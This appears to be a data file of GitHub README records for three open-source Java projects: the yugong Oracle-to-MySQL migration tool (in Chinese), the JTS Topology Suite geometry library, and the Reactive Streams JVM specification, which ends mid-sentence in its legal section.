## 背景 2008年,阿里巴巴开始尝试使用 MySQL 支撑其业务,开发了围绕 MySQL 相关的中间件和工具,Cobar/TDDL(目前为阿里云DRDS产品),解决了单机 Oracle 无法满足的扩展性问题,当时也掀起一股去IOE项目的浪潮,愚公这项目因此而诞生,其要解决的目标就是帮助用户完成从 Oracle 数据迁移到 MySQL 上,完成去 IOE 的重要一步工作。 ## 项目介绍 名称:   yugong 译意:   愚公移山 语言:   纯java开发 定位:   数据库迁移 (目前主要支持oracle / mysql / DRDS) ## 项目介绍 整个数据迁移过程,分为两部分: 1. 全量迁移 2. 增量迁移 ![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67) 过程描述: 1. 增量数据收集 (创建oracle表的增量物化视图) 2. 进行全量复制 3. 进行增量复制 (可并行进行数据校验) 4. 原库停写,切到新库 ## 架构 ![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png){width="584" height="206"} 说明:  1. 一个Jvm Container对应多个instance,每个instance对应于一张表的迁移任务 2.  instance分为三部分 a.  extractor  (从源数据库上提取数据,可分为全量/增量实现) b.  translator  (将源库上的数据按照目标库的需求进行自定义转化) c.  applier  (将数据更新到目标库,可分为全量/增量/对比的实现) ## 方案设计 [DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign) ## 快速开始 [QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart) ## 运维管理 [AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide) ## 性能报告 [Performance](https://github.com/alibaba/yugong/wiki/Performance) ## 相关资料 1. yugong简单介绍ppt: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true) 2. [分布式关系型数据库服务DRDS](https://www.aliyun.com/product/drds) (前身为阿里巴巴公司的Cobar/TDDL的演进版本, 基本原理为MySQL分库分表) ## 沟通与交流 1. 详见 wiki home 页
0
locationtech/jts
The JTS Topology Suite is a Java library for creating and manipulating vector geometry.
computational-geometry geometric-algorithms geometry geometry-algorithms geometry-library gis java java-library jts jts-topology-suite ogc ogc-wkt triangulation voronoi
JTS Topology Suite ================== The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions. ![JTS logo](jts_logo.png) [![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions) [![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation. ![LocationTech](locationtech_mark.png) ## Requirements Currently JTS targets Java 1.8 and above. ## Resources ### Code * [GitHub Repo](https://github.com/locationtech/jts) * [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts) ### Websites * [LocationTech Home](https://locationtech.org/projects/technology.jts) * [GitHub web site](https://locationtech.github.io/jts/) ### Communication * [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev) * [Gitter Channel](https://gitter.im/locationtech/jts) ### Forums * [Stack Overflow](https://stackoverflow.com/questions/tagged/jts) * [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite) ## License JTS is open source software. It is dual-licensed under: * [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html) * [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License) See also: * [License details](LICENSES.md) * Licensing [FAQ](FAQ-LICENSING.md) ## Documentation * [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS * [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions * [**User Guide**](USING.md) - Installing and using JTS * [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS * [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS * [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS ## History * [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md) * History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history) * Older versions of JTS can be found on SourceForge * There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions) ## Contributing If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md). ## Downstream Projects ### Derivatives (ports to other languages) * [**GEOS**](https://trac.osgeo.org/geos) - C++ * [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET * [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript * [**dart_jts**](https://github.com/moovida/dart_jts) - Dart ### Via GEOS * [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS * [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS * [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS * [**GEOSwift**](https://github.com/GEOSwift/GEOSwift)- Swift library using GEOS There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications).
0
reactive-streams/reactive-streams-jvm
Reactive Streams Specification for the JVM
null
# Reactive Streams # The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure. The latest release is available on Maven Central as ```xml <dependency> <groupId>org.reactivestreams</groupId> <artifactId>reactive-streams</artifactId> <version>1.0.4</version> </dependency> <dependency> <groupId>org.reactivestreams</groupId> <artifactId>reactive-streams-tck</artifactId> <version>1.0.4</version> <scope>test</scope> </dependency> ``` ## Goals, Design and Scope ## Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine. The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation. It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application. It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed. In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that - process a potentially unbounded number of elements - in sequence, - asynchronously passing elements between components, - with mandatory non-blocking backpressure. The Reactive Streams specification consists of the following parts: ***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations. ***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations. Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK. ### API Components ### The API consists of the following components that are required to be provided by Reactive Stream implementations: 1. Publisher 2. Subscriber 3. Subscription 4. Processor A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s). In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol: ``` onSubscribe onNext* (onError | onComplete)? ``` This means that `onSubscribe` is always signalled, followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled. #### NOTES - The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt ### Glossary | Term | Definition | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="term_signal">Signal</a> | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. | | <a name="term_demand">Demand</a> | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. | | <a name="term_sync">Synchronous(ly)</a> | Executes on the calling Thread. | | <a name="term_return_normally">Return normally</a> | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.| | <a name="term_responsivity">Responsivity</a> | Readiness/ability to respond. In this document used to indicate that the different components should not impair each others ability to respond. | | <a name="term_non-obstructing">Non-obstructing</a> | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. | | <a name="term_terminal_state">Terminal state</a> | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.| | <a name="term_nop">NOP</a> | Execution that has no detectable effect to the calling thread, and can as such safely be called any number of times.| | <a name="term_serially">Serial(ly)</a> | In the context of a [Signal](#term_signal), non-overlapping. In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. | | <a name="term_thread-safe">Thread-safe</a> | Can be safely invoked synchronously, or asychronously, without requiring external synchronization to ensure program correctness. | ### SPECIFICATION #### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java)) ```java public interface Publisher<T> { public void subscribe(Subscriber<? super T> s); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="1.1">1</a> | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. | | [:bulb:](#1.1 "1.1 explained") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* | | <a name="1.2">2</a> | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`. | | [:bulb:](#1.2 "1.2 explained") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* | | <a name="1.3">3</a> | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). | | [:bulb:](#1.3 "1.3 explained") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* | | <a name="1.4">4</a> | If a `Publisher` fails it MUST signal an `onError`. | | [:bulb:](#1.4 "1.4 explained") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* | | <a name="1.5">5</a> | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. | | [:bulb:](#1.5 "1.5 explained") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* | | <a name="1.6">6</a> | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. | | [:bulb:](#1.6 "1.6 explained") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* | | <a name="1.7">7</a> | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. | | [:bulb:](#1.7 "1.7 explained") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* | | <a name="1.8">8</a> | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. | | [:bulb:](#1.8 "1.8 explained") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* | | <a name="1.9">9</a> | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). | | [:bulb:](#1.9 "1.9 explained") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* | | <a name="1.10">10</a> | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. | | [:bulb:](#1.10 "1.10 explained") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* | | <a name="1.11">11</a> | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. | | [:bulb:](#1.11 "1.11 explained") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* | #### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java)) ```java public interface Subscriber<T> { public void onSubscribe(Subscription s); public void onNext(T t); public void onError(Throwable t); public void onComplete(); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="2.1">1</a> | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. | | [:bulb:](#2.1 "2.1 explained") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing. It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient "stop-and-wait" protocol.* | | <a name="2.2">2</a> | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. | | [:bulb:](#2.2 "2.2 explained") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* | | <a name="2.3">3</a> | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. | | [:bulb:](#2.3 "2.3 explained") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* | | <a name="2.4">4</a> | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. | | [:bulb:](#2.4 "2.4 explained") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* | | <a name="2.5">5</a> | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. | | [:bulb:](#2.5 "2.5 explained") | *The intent of this rule is to prevent that two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. Such violations can lead to hard-to-diagnose bugs.* | | <a name="2.6">6</a> | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. | | [:bulb:](#2.6 "2.6 explained") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* | | <a name="2.7">7</a> | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). | | [:bulb:](#2.7 "2.7 explained") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* | | <a name="2.8">8</a> | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. | | [:bulb:](#2.8 "2.8 explained") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* | | <a name="2.9">9</a> | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. | | [:bulb:](#2.9 "2.9 explained") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* | | <a name="2.10">10</a> | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. | | [:bulb:](#2.10 "2.10 explained") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* | | <a name="2.11">11</a> | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. | | [:bulb:](#2.11 "2.11 explained") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* | | <a name="2.12">12</a> | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). | | [:bulb:](#2.12 "2.12 explained") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* | | <a name="2.13">13</a> | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. | | [:bulb:](#2.13 "2.13 explained") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in which case this rule is violated. «Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* | #### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java)) ```java public interface Subscription { public void request(long n); public void cancel(); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="3.1">1</a> | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. | | [:bulb:](#3.1 "3.1 explained") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. The Subscriber is in control over when elements are requested and when more elements are no longer needed.* | | <a name="3.2">2</a> | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. | | [:bulb:](#3.2 "3.2 explained") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* | | <a name="3.3">3</a> | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. | | [:bulb:](#3.3 "3.3 explained") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* | | <a name="3.4">4</a> | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. | | [:bulb:](#3.4 "3.4 explained") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* | | <a name="3.5">5</a> | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). | | [:bulb:](#3.5 "3.5 explained") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* | | <a name="3.6">6</a> | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). | | [:bulb:](#3.6 "3.6 explained") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* | | <a name="3.7">7</a> | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). | | [:bulb:](#3.7 "3.7 explained") | *The intent of this rule is superseded by [3.5](#3.5).* | | <a name="3.8">8</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. | | [:bulb:](#3.8 "3.8 explained") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* | | <a name="3.9">9</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. | | [:bulb:](#3.9 "3.9 explained") | *The intent of this rule is to prevent faulty implementations to proceed operation without any exceptions being raised. Requesting a negative or 0 number of elements, since requests are additive, most likely to be the result of an erroneous calculation on the behalf of the Subscriber.* | | <a name="3.10">10</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). | | [:bulb:](#3.10 "3.10 explained") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | | <a name="3.11">11</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). | | [:bulb:](#3.11 "3.11 explained") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | | <a name="3.12">12</a> | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. The operation is NOT REQUIRED to affect the `Subscription` immediately. | | [:bulb:](#3.12 "3.12 explained") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* | | <a name="3.13">13</a> | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. | | [:bulb:](#3.13 "3.13 explained") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* | | <a name="3.14">14</a> | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. | | [:bulb:](#3.14 "3.14 explained") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* | | <a name="3.15">15</a> | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). | | [:bulb:](#3.15 "3.15 explained") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* | | <a name="3.16">16</a> | Calling `Subscription.request` MUST [return normally](#term_return_normally). | | [:bulb:](#3.16 "3.16 explained") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* | | <a name="3.17">17</a> | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. | | [:bulb:](#3.17 "3.17 explained") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* | A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback. #### 4.Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java)) ```java public interface Processor<T, R> extends Subscriber<T>, Publisher<R> { } ```` | ID | Rule | | ------------------------ | ------------------------------------------------------------------------------------------------------ | | <a name="4.1">1</a> | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both. | | [:bulb:](#4.1 "4.1 explained") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* | | <a name="4.2">2</a> | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. | | [:bulb:](#4.2 "4.2 explained") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* | While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`, to let the cancellation signal propagate upstream. ### Asynchronous vs Synchronous Processing ### The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously. Take this example: ``` nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput) ``` It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this. The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads). ``` nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput) -------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ---------------- ``` In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever. ``` nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput) ------------------- R1 ----------------- | ---------- R2 ---------------- ``` Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread. Or another implementation could fuse the operations to the final consumer: ``` nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput) --------- R1 ---------- | ------------------ R2 ------------------------- ``` All of these variants are "asynchronous streams". They all have their place and each has different tradeoffs including performance and implementation complexity. The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream. In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`. ### Subscriber controlled queue bounds ### One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general. Since back-pressure is mandatory the use of unbounded buffers can be avoided. In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead. Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows: - the total number of elements requested: `P` - the number of elements that have been processed: `N` Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements B in its input buffer then this bound can be refined to `P - B - N`. These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds. Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips). ## Legal This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many 